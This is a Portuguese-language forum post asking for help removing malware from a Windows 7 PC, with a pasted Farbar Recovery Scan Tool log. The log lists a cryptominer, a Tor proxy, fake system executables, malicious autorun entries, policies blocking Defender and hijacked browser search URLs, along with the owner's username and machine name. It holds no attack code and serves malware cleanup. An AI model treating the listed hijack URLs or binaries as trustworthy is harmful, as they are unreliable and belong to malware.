Logo Hardware.com.br
Mr Andersen
Mr Andersen Novo Membro Registrado
19 Mensagens 6 Curtidas

[Resolvido] Vírus que bloqueia firewall do Windows e faz altas paradas

#1 Por Mr Andersen 05/06/2018 - 23:40
Estava mexendo no Pc de boas, quando, se instalou um vírus que, bloqueia o firewall do Windows, o windows defender, zoa a desinstalação de programas (ele meio que atrapalha ela) é fica instalando um monte de coisa, além de ficar abrindo guias do internet Explorer e alterando ele pra navegador padrão, alguém pode por favor me ajudar?

logs
FRST.txt
https://www.cjoint.com/c/HFglfaFL3wu
Adittion .txt
https://www.cjoint.com/c/HFglgh6bicu
Logs pra caso o link expire
"FRST.txt"

Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 03.06.2018
Executado por Alessandra (administrador) em ALESSANDRA-PC (06-06-2018 07:59:50)
Executando a partir de C:\Users\Alessandra\Desktop
Perfis Carregados: Alessandra (Perfis Disponíveis: Alessandra)
Platform: Windows 7 Professional Service Pack 1 (X64) Idioma: Português (Brasil)
Internet Explorer Versão 8 (Navegador padrão: Chrome)
Modo da Inicialização: Normal
Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processos (Whitelisted) =================

(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

() C:\Program Files\5850f7899b7a00e77740675180ff5f97\eafeb516191690959119ed8371b79fca.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
() C:\ProgramData\Logic Cramble\set.exe
(TODO: ) C:\ProgramData\Kipolam\Kipolam.exe
() C:\ProgramData\PrefsSecure\Nettrans.exe
() C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
(pdfforge GmbH) C:\Program Files\PDF Architect 4\creator-ws.exe
(© pdfforge GmbH.) C:\ProgramData\pdfforge\PDF Architect 4 Manager\PDF Architect 4\Architect Manager.exe
(VoiceFive, Inc.) C:\Program Files (x86)\PremierOpinion\pmservice.exe
() C:\Windows\SysWOW64\SecUPDUtilSvc.exe
(Samsung Electronics CO., LTD.) C:\ProgramData\Samsung\SW Update Service\SWMAgent.exe
() C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\tor.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
() C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\obfs4proxy.exe
() C:\Program Files (x86)\WeatherTool\2.0.1.5000183\WeatherService.exe
() C:\Windows\windefender.exe
(VoiceFive, Inc.) C:\Program Files (x86)\PremierOpinion\pmropn.exe
(ShenZhen Enode Techology co,.Ltd) C:\Program Files (x86)\WeatherTool\2.0.1.5000183\weather_lite.exe
(Samsung Electronics CO., LTD.) C:\Program Files\Samsung\S Agent\CommonAgent.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(VoiceFive, Inc.) C:\Program Files (x86)\PremierOpinion\pmropn32.exe
(VoiceFive, Inc.) C:\Program Files (x86)\PremierOpinion\pmropn64.exe
() C:\Users\Alessandra\AppData\Local\Temp\xmrig.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(5X) C:\Program Files (x86)\bf1o5vdufsa\VQ4R6SI3GUSCYUI.exe
(A.E.T. Europe B.V.) C:\Windows\System32\aetcrss1.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(5X) C:\Program Files\XXWL8VTRHR\XXWL8VTRH.exe
( ) C:\Users\Alessandra\AppData\Roaming\fwpra3jae2a\5rdiqyozohf.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\h2a4yahxqry\gje1ddkrsb3.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
(ADS5GG@D) C:\Program Files\DPGD3TU7OG\DPGD3TU7O.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-5TP8H.tmp\5rdiqyozohf.tmp
(Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
(5X) C:\Program Files (x86)\bf1o5vdufsa\DW7TM.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-S3C6D.tmp\gje1ddkrsb3.tmp
(EpicNet Inc.) C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\bmg5xaggxdy\4w2suwq3kyp.exe
(5X) C:\Program Files\1J8EIRX58C\LB3FQUZP1.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\ytpzcu0tpuu\ydak1uysdro.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(5X) C:\Program Files\D01R7PS11V\D01R7PS11.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\kedvvl2dmyu\5dpz20uzgsy.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-F31S8.tmp\4w2suwq3kyp.tmp
(Hdid ) C:\Users\Alessandra\AppData\Roaming\mylj0dzpmis\imjsul3e1mv.exe
(Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-QTJFQ.tmp\ydak1uysdro.tmp
(5X) C:\Program Files\X4NT86L8PB\ATU8G5R9O.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\sigqcdae4vw\30pkxk0pivi.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-U3PGO.tmp\5dpz20uzgsy.tmp
(5X) C:\Program Files\F20NRXHM4L\1D0IR75AM.exe
(Hdid ) C:\Users\Alessandra\AppData\Roaming\bvohckxrv4t\1h11oowtwfi.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-RPQ8E.tmp\imjsul3e1mv.tmp
(5X) C:\Program Files\22F4FU47HD\22F4FU47H.exe
() C:\Windows\Samsung\PanelMgr\SSMMgr.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-4PDJ2.tmp\1h11oowtwfi.tmp
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
() C:\Users\Alessandra\AppData\Local\Temp\is-4PDJ1.tmp\30pkxk0pivi.tmp
(WhiteClick) C:\Users\Alessandra\AppData\Local\WhiteClick\Start.exe
() C:\Windows\Samsung\PanelMgr\caller64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Autodesk, Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(HP Inc.) C:\Program Files\HP\HP Touchpoint Analytics Client\TouchpointAnalyticsClientService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registro (Whitelisted) ===========================

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

HKLM\...\Run: [CertificateRegistration] => C:\Windows\system32\aetcrss1.exe [25600 2013-03-04] (A.E.T. Europe B.V.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3274056 2013-11-25] (ELAN Microelectronics Corp.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems, Incorporated)
HKLM-x32\...\Run: [Samsung PanelMgr] => C:\Windows\Samsung\PanelMgr\ssmmgr.exe [618496 2010-10-28] ()
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2384984 2016-12-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Discord] => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [54332920 2017-09-02] (Discord Inc.)
HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [704424 2017-06-15] (Autodesk, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [588704 2018-03-28] (Oracle Corporation)
HKLM-x32\...\Run: [Speedycar] => C:\Program Files (x86)\Speedycar\Speedycar.exe [18136576 2018-01-02] ()
HKLM\...\RunOnce: [OMEWPRODUCT_2UIFV] => C:\Program Files (x86)\bf1o5vdufsa\VQ4R6SI3GUSCYUI.exe [52224 2018-06-05] (5X) <==== ATENÇÃO
HKLM\...\RunOnce: [pob3s0h3rht] => C:\Program Files (x86)\io\463325.exe [671232 2018-06-05] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restrição <==== ATENÇÃO
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe [143360 2006-12-23] (Nero AG)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [Akamai NetSession Interface] => "C:\Users\Alessandra\AppData\Local\Akamai\netsession_win.exe"
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [SilentViolet] => C:\Windows\rss\csrss.exe [3224064 2018-06-05] () <==== ATENÇÃO
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [S6AKIFRRVSEQT13] => C:\Program Files\XXWL8VTRHR\XXWL8VTRH.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [3872389] => C:\Users\Alessandra\AppData\Roaming\h2a4yahxqry\gje1ddkrsb3.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [KMN2V7EI8ZVJBR3] => C:\Program Files (x86)\bf1o5vdufsa\DW7TM.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [CloudNet] => C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-05] (EpicNet Inc.) <==== ATENÇÃO
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [8703607] => C:\Users\Alessandra\AppData\Roaming\bmg5xaggxdy\4w2suwq3kyp.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [8Y5UZRHXRFXAQOK] => C:\Program Files\1J8EIRX58C\LB3FQUZP1.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [3659841] => C:\Users\Alessandra\AppData\Roaming\ytpzcu0tpuu\ydak1uysdro.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [BI73TEID5O9F6QJ] => C:\Program Files\D01R7PS11V\D01R7PS11.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [9994632] => C:\Users\Alessandra\AppData\Roaming\kedvvl2dmyu\5dpz20uzgsy.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [9485984] => C:\Users\Alessandra\AppData\Roaming\mylj0dzpmis\imjsul3e1mv.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [1YLHJZWZQ4EUJEB] => C:\Program Files\X4NT86L8PB\ATU8G5R9O.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [8314470] => C:\Users\Alessandra\AppData\Roaming\sigqcdae4vw\30pkxk0pivi.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [SWR364A0TBPNGLR] => C:\Program Files\F20NRXHM4L\1D0IR75AM.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [4093497] => C:\Users\Alessandra\AppData\Roaming\bvohckxrv4t\1h11oowtwfi.exe [534894 2018-06-05] (Hdid )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [B18WJ9MV5BSPEJ6] => C:\Program Files\22F4FU47HD\22F4FU47H.exe [666624 2018-06-05] (5X)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [8272955] => C:\Users\Alessandra\AppData\Roaming\fwpra3jae2a\5rdiqyozohf.exe [735941 2018-06-06] ( )
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Run: [WRK07J3DVX52BTM] => C:\Program Files\DPGD3TU7OG\DPGD3TU7O.exe [666624 2018-06-06] (ADS5GG@D)
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Policies\Explorer: []
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\MountPoints2: {7dd37410-93cc-11e6-90a6-50b7c3c6601c} - E:\AutoRun.exe "motorola.html"
HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\MountPoints2: {88d87ecb-b33b-11e5-9517-50b7c3c6601c} - E:\LGAutoRun.exe
HKU\S-1-5-18\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-18\...\RunOnce: [SPReview] => "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"hxxp://go.microsoft.com/fwlink/?LinkID=122915" /build:7601
AppInit_DLLs: C:\ProgramData\Kipolam\Fasehold.dll => C:\ProgramData\Kipolam\Fasehold.dll [342528 2018-06-05] ()
AppInit_DLLs-x32: C:\ProgramData\Kipolam\InJob.dll => C:\ProgramData\Kipolam\InJob.dll [460800 2018-06-05] ()
SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation)
SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation)
ShellExecuteHooks: Sem Nome - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
Startup: C:\Users\Alessandra\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shortcut to Primary output from Start (Active).lnk [2018-06-05]
ShortcutTarget: Shortcut to Primary output from Start (Active).lnk -> C:\Users\Alessandra\AppData\Roaming\Microsoft\Installer\{D66F6F24-652D-4405-A0D3-C568F825FE66}\_76328BABB32558415FD627.exe ()
GroupPolicy: Restrição - Chrome <==== ATENÇÃO
CHR HKLM\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO

==================== Internet (Whitelisted) ====================

(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

Hosts: Há mais de uma entrada no Hosts. Veja a seção Hosts do Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.15.1
Tcpip\..\Interfaces\{3880F638-1B59-4D35-A275-8EE9B685104D}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{BC629E5C-C9A6-4E4C-9EAC-D2E12FE32030}: [DhcpNameServer] 192.168.15.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
HKU\S-1-5-21-1322778411-14668823-402750941-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UwOxMMeTBFvGVOtfL0DOCuIUm6tTqtM8oPXNWl4Ab_RnHfNjunQ6XH9vlS-5hx2xQwe5_cXmRv2i_mLieyJSckFaWSM,&q={searchTerms}
HKU\S-1-5-21-1322778411-14668823-402750941-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5X1PSSGRFE7C0CY8d5RznzVJED9kXfb-LxU-ujG2jkjHebgauFvGg_1XDweDAcaAR813YtNxMwVz2uyRGbhw9ilsvE3c,
HKU\S-1-5-21-1322778411-14668823-402750941-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pt-br/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UwOxMMeTBFvGVOtfL0DOCuIUm6tTqtM8oPXNWl4Ab_RnHfNjunQ6XH9vlS-5hx2xQwe5_cXmRv2i_mLieyJSckFaWSM,&q={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_bxinw_17_21&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyDtD0ByB0CtA0CyCyCtDtC0Czz0CyEtBtN0D0Tzu0StCzyyBtCtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StDtD0B0CyByEtA0CtGtByCyC0DtGtCyE0EyBtGyBtCzztAtG0A0E0EtDtBtD0C0A0BtDyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAyDtDtAzytC0AtBtGtAyC0E0CtGyEtBzz0DtGzz0CtCyBtG0F0DyBtB0F0D0F0DyByDyDtA2QtN0A0LzuyE%26cr%3D1752191025%26a%3Dwncy_bxinw_17_21%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> {B558FF02-7E0B-4BFF-B740-6C09BA8781E1} URL = hxxps://br.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=502468&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> {C0C3A6C6-03BC-4195-8FCB-AEA091301353} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__ch_WCYID10301__161124__yaie&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1322778411-14668823-402750941-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UwOxMMeTBFvGVOtfL0DOCuIUm6tTqtM8oPXNWl4Ab_RnHfNjunQ6XH9vlS-5hx2xQwe5_cXmRv2i_mLieyJSckFaWSM,&q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2015-11-18] (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_171\bin\ssv.dll [2018-04-27] (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: YoutubeAdBlock -> {C0D38E5A-7CF8-4105-8FE8-31B81443A114} -> C:\Program Files (x86)\lJFUJMGEHIE\tjOwysmM4.dll [2018-06-05] ()
